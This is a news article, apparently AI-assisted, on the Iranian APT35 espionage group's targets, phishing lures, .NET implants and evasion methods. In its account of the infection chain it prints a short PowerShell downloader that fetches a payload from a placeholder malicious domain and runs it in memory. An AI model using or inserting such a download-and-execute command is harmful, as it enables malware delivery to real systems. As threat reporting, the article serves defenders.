Friday, August 14, 2026
LIVE
Israeli Authorities Charge Settler with Manslaughter over Death of Palestinian Activist///United Nations Report Documents Deliberate Attacks on Civilians in Myanmar///Palestinian Families in Qusra Remain Under Settler Siege for Sixth Day///Israeli Prime Minister Rejects New United States Proposal for Gaza Peace///Houthi Forces Strike Mocha Port on Yemen Red Sea Coast///Satellite Analysis Examines Potential Impact of Strikes on Iranian Facility///United Nations Renews Calls for Civilian Protection Amid Ongoing Sudan Conflict///New Commercial Quay Begins Operations at Syria Port of Tartous///US Threatens Economic Pressure on Iran After New Tanker Attacks///Rising West Bank Settler Violence Framed as Retaliation by Residents///Mass funeral held in Gaza for families killed in 2023 strike///Concerns Mount Over United States Missile Inventories Amid Iran Conflict Pause///Israeli Authorities Charge Settler with Manslaughter over Death of Palestinian Activist///United Nations Report Documents Deliberate Attacks on Civilians in Myanmar///Palestinian Families in Qusra Remain Under Settler Siege for Sixth Day///Israeli Prime Minister Rejects New United States Proposal for Gaza Peace///Houthi Forces Strike Mocha Port on Yemen Red Sea Coast///Satellite Analysis Examines Potential Impact of Strikes on Iranian Facility///United Nations Renews Calls for Civilian Protection Amid Ongoing Sudan Conflict///New Commercial Quay Begins Operations at Syria Port of Tartous///US Threatens Economic Pressure on Iran After New Tanker Attacks///Rising West Bank Settler Violence Framed as Retaliation by Residents///Mass funeral held in Gaza for families killed in 2023 strike///Concerns Mount Over United States Missile Inventories Amid Iran Conflict Pause///
Subscribe
The Levant
Independent · Digital
The Levant Herald
PoliticsAI-assisted

IRGC-Linked APT35 Structure, Tools, and Espionage Operations Disclosed

IRGC-linked APT35 has been identified as a significant threat actor since the mid-2010s, targeting government entities, energy firms, and diplomatic missions predominantly in the Middle East. The group has evolved from credential harvesting through…

IRGC-linked APT35 has been identified as a significant threat actor since the mid-2010s, targeting government entities, energy firms, and diplomatic missions predominantly in the Middle East. The group has evolved from credential harvesting through phishing campaigns to deploying a modular toolkit for network infiltration and long-term espionage.

The group's operations typically begin with spear-phishing messages exploiting Office macro vulnerabilities, which enable the deployment of backdoors. APT35 utilizes a combination of custom and publicly available tools, allowing researchers to identify distinct code fingerprints despite the adversary's transition between different payloads.

Cloudsek analysts have identified a shift in APT35's methodology, notably the use of .NET-based implants and in-memory execution techniques, increasing the complexity of forensic analysis by reducing disk artifacts. This finding has led to the development of tailored detection rules for network defenders.

The group's operations have resulted in significant data exfiltration from compromised networks, including diplomatic communications and intellectual property theft. APT35 employs operational security measures such as randomized command-and-control beaconing intervals and encrypted communication channels over HTTP/HTTPS, which enables them to avoid traditional signature-based defenses.

IRGC-linked APT35 has been identified as a significant threat actor since the mid-2010s, targeting government entities, energy firms, and diplomatic missions predominantly in the Middle East.
Samira Haddad · The Levant Herald

APT35's primary infection method involves weaponized Word documents containing obfuscated VBA macros designed to load a staged downloader into memory. Upon document opening, the macro executes a PowerShell command masquerading as a Windows Update process:

$u = "http://malicious[.]domain/payload.bin" $r = Invoke-WebRequest -Uri $u -UseBasicParsing $e = [System.Text.Encoding]::UTF8.GetString($r.Content) Invoke-Expression $e

This downloader decrypts the next-stage payload using an AES key embedded in the VBA code. The decrypted payload, typically a .NET-compiled backdoor known as PhosphorusLoader , registers as a COM object for persistence. It uses process hollowing to inject into svchost.exe while intermittently communicating with a hidden C2 domain.

Advertisement

APT35 also conducts extensive open-source intelligence (OSINT) gathering to craft convincing lures and leverage geopolitical events and professional contacts within targeted organizations. This approach, combined with advanced malware, highlights the group's adaptability and resource investment.

Based on reporting by Cyber Security News.

AI transparency. This article was produced with the assistance of artificial intelligence and published under human editorial oversight. AI systems can make mistakes. Read how we use AI (EU AI Act, Art. 50).
Related Stories